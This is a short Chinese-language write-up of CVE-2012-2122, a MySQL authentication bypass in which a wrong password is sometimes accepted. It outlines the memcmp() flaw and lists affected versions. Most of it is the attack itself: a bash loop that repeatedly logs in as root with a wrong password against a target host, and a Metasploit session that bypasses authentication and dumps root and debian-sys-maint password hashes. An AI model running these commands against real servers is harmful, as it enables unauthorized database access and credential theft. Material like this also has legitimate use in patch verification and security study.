CVE-2012-2122(MySql身份认证绕过)
1. 漏洞概述
存在该漏洞的版本Mysql允许攻击者穷举256次用户密码,便能成功登录Mysql服务器。这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用。如果MySQL建立在这样一个系统上,那么源代码会拿用户输入的密码哈希表与数据库中某个特殊账户中存储的哈希表进行比对,有些情形下甚至可以允许输入密码不正确也能通过认证。
2. 影响版本
1
| MySQL 5.1.62, 5.2.12, 5.3.6, 5.5.23
|
3. 漏洞复现
最终在39此错误之后,直接进入了MySQL。
4. Payload
1
| for i in `seq 1 1000`; do mysql -uroot -pwrong -h (IP) -P3306 ; done
|
5. 利用方法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| $ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
|
